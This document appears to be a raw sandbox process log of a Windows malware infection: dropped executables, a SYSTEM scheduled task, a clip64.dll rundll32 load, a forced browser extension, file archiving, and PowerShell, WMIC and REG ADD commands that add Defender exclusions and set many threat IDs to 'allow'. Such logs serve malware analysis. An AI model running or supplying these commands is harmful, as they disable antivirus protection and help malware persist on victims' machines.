C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe

"C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\Admin\AppData\Local\Temp\Extension"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb1ebc46f8,0x7ffb1ebc4708,0x7ffb1ebc4718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\Pictures\lUuhMnQQ7PvdGMiY8iAqBpGd.exe

"C:\Users\Admin\Pictures\lUuhMnQQ7PvdGMiY8iAqBpGd.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=280 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2216 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8

C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe

"C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe"

C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe

"C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3100 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4244 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4296 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Users\Admin\Pictures\JxSE1viobyTMzUdd6pr1jYEY.exe

"C:\Users\Admin\Pictures\JxSE1viobyTMzUdd6pr1jYEY.exe"

C:\Users\Admin\Pictures\WUjqLI0y9xE0qFjc74GfaVjZ.exe

"C:\Users\Admin\Pictures\WUjqLI0y9xE0qFjc74GfaVjZ.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4076 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1656 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe

"C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe"

C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe

"C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\597858682981_Desktop.zip' -CompressionLevel Optimal

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main

C:\Users\Admin\Pictures\qOUAgB63FuuHS2R8dK3BVAuF.exe

"C:\Users\Admin\Pictures\qOUAgB63FuuHS2R8dK3BVAuF.exe"

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe

"C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe" --silent --allusers=0

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x29c,0x2a0,0x2a4,0x278,0x2a8,0x6bbde1d0,0x6bbde1dc,0x6bbde1e8

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\dwH8FokgOu20Z9ZQ360ELUmq.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\dwH8FokgOu20Z9ZQ360ELUmq.exe" --version

C:\Windows\SysWOW64\sc.exe

Sc delete GameServerClient

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe

"C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5072 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240425172628" --session-guid=b200a801-0345-4bac-b0d3-5d2104abafd8 --server-tracking-blob="NGUwYzE0ZTFmYWI3YWNmYzA5ZjFiMDE0OWFhMzg0ODBhNDEzMGIxYzQzZjU3OWExMDYwYzUyNjA5NDM1M2Y0MDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fMTIzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MDY1OTc1LjMxOTYiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzEyMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiNTAxNDIxMWUtMGExMS00NzYyLWJjMGItYWI4MDYxZDZhYjNjIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C04000000000000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\u4a4.0.exe

"C:\Users\Admin\AppData\Local\Temp\u4a4.0.exe"

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x298,0x2a8,0x2ac,0x274,0x2b0,0x6b0ce1d0,0x6b0ce1dc,0x6b0ce1e8

C:\Users\Admin\Pictures\Btf5cq1Bmhr53WKazgbpOEpg.exe

"C:\Users\Admin\Pictures\Btf5cq1Bmhr53WKazgbpOEpg.exe"

C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe

"C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe" --silent --allusers=0

C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe

C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6a18e1d0,0x6a18e1dc,0x6a18e1e8

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService remove GameServerClient confirm

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\afis2GlxSRlazYtAhh6nmdeH.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\afis2GlxSRlazYtAhh6nmdeH.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zS562A.tmp\Install.exe

.\Install.exe /RvdidblCuX "385118" /S

C:\Users\Admin\AppData\Local\Temp\u52w.0.exe

"C:\Users\Admin\AppData\Local\Temp\u52w.0.exe"

C:\Users\Admin\AppData\Local\Temp\u4a4.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u4a4.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\u52w.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u52w.2\run.exe"

C:\Users\Admin\AppData\Local\Temp\u4a4.3.exe

"C:\Users\Admin\AppData\Local\Temp\u4a4.3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7364 -ip 7364

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 1204

C:\Users\Admin\Pictures\uj9zf1WQ2J1PKGLCSCT6a98V.exe

"C:\Users\Admin\Pictures\uj9zf1WQ2J1PKGLCSCT6a98V.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6584 -ip 6584

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 1412

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 17:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\MATpqzT.exe\" em /YOsite_idnfL 385118 /S" /V1 /F

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6112 -ip 6112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 1016

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService start GameServerClient

C:\Program Files (x86)\GameServerClient\GameService.exe

"C:\Program Files (x86)\GameServerClient\GameService.exe"

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Windows\Temp\677655.exe

"C:\Windows\Temp\677655.exe" --list-devices

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x11b6038,0x11b6044,0x11b6050

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\MATpqzT.exe

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\MATpqzT.exe em /YOsite_idnfL 385118 /S

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\sc.exe

Sc delete GameServerClientC

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

